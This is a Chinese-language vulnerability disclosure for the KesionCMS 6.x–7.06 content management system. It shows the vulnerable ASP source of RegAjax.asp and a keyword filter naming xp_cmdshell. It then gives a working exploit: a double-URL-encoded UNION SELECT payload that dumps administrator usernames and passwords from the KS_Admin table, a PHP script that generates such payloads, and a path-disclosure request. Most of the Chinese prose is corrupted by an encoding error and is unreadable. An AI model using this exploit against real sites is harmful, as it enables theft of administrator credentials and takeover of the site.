Ѷ 6.x - 7.06 SQL ע© 

©

¶״̬



2011-07-27 ϵ̲ҵȴУϸڲ⹫
2011-07-27 Ѿ©ϸڹ


Ҫ


ϸ˵

Author:my5t3ry
 תעt00ls.net
 ©λעҳ\User\Reg\RegAjax.asp е24 - 46  254 -270  £
 
Class Ajax_Check
        Private KS
                Private Sub Class_Initialize()
                  Set KS=New PublicCls
                End Sub
        Private Sub Class_Terminate()
                 Set KS=Nothing
                End Sub
                Public Sub Kesion()
                  
                  Select Case KS.S("Action")
                   Case "checkusername"
                    Call CheckUserName()
                   Case "checkemail"
                    Call CheckEmail()
                   Case "checkcode"
                    Call CheckCode()
                   Case "getregform"
                    Call GetRegForm()
                   Case "getcityoption"
                    Call getCityOption()
                  End Select
                End Sub

ȥ޹ش

                Sub getCityOption()
                  Dim Province,XML,Node
                  Province=UnEscape(KS.S("Province"))  //ע
                  Dim RS:Set RS=Server.CreateObject("ADODB.RECORDSET")
                  RS.Open "Select top 200 a.ID,a.City From KS_Province a Inner Join KS_Province b On A.ParentID=B.ID Where B.City='" & Province & "' order by a.orderid,a.id",conn,1,1
                  If Not RS.Eof Then
                    Set XML=KS.RsToXml(Rs,"row","")
                  End If
                  RS.Close : Set RS=Nothing
                  If IsObject(XML) Then
                   For Each Node In XML.DocumentElement.SelectNodes("row")
                      KS.Echo "<option value=""" & node.SelectSingleNode("@city").text &""">" & node.SelectSingleNode("@city").text &"</option>"
                   Next
                  End If
                  Set XML=Nothing
                End Sub
End Class

 ϴеProvince=UnEscape(KS.S("Province")) Զ庯KS.SйˣֵUnEscape룡
 
KS.S  UnEscape ԭ:
 
Function DelSql(Str)
 Dim SplitSqlStr,SplitSqlArr,I
 SplitSqlStr="dbcc|alter|drop|*|and |exec|or |insert|select|delete|update|count |master|truncate|declare|char|mid|chr|set |where|xp_cmdshell"
 SplitSqlArr = Split(SplitSqlStr,"|")
 For I=LBound(SplitSqlArr) To Ubound(SplitSqlArr)
 If Instr(LCase(Str),SplitSqlArr(I))>0 Then
 Die "<script>alert('ϵͳ棡\n\n1ύжַ" & SplitSqlArr(I) &";\n2Ѿ¼;\n3IP"&GetIP&";\n4ڣ"&Now&";\n Powered By Kesion.Com!');window.close();</script>"
 End if
 Next
 DelSql = Str
 End Function
 'ȡRequest.Querystring  Request.Form ֵ
Public Function S(Str)
 S = DelSql(Replace(Replace(Request(Str), "'", ""), """", ""))
 End Function
 
ֻңphpĶαƵ©ñȽϼ򵥣union
 
http://localhost/user/reg/regajax.asp?action=getcityoption&province=%2527%2520%2575%256e%2569%256f%256e%2520%2553%2565%256c%2565%2563%2574%2520%2574%256f%2570%2520%2531%2530%2520%2541%2564%256d%2569%256e%2549%2544%252c%2555%2573%2565%2572%254e%2561%256d%2565%2526%2563%2568%2572%2528%2531%2532%2534%2529%2526%2550%2561%2573%2573%2557%256f%2572%2564%2520%2546%2572%256f%256d%2520%254b%2553%255f%2541%2564%256d%2569%256e%2500
 
ACCESSMSSQLҪSQL䣺
 
<?php
 $str = "' union Select top 10 AdminID,UserName&chr(124)&PassWord From KS_Admin";
 for ($i=0; $i<=strlen($str); $i++){
 $temp .= "%25".base_convert(ord($str[$i]),10,16);
 }
 echo $temp."0";
 ?>
 
޸' union Select top 10 AdminID,UserName&chr(124)&PassWord From KS_AdminΪӦSQL伴ɡMSSQLֱӱݲȽϷ㣩
 
ΪʱCLngתύַʹ䱨Ӷ·
 ·:http://localhost/user/reg/regajax.asp?action=getcityoption&province=%25i
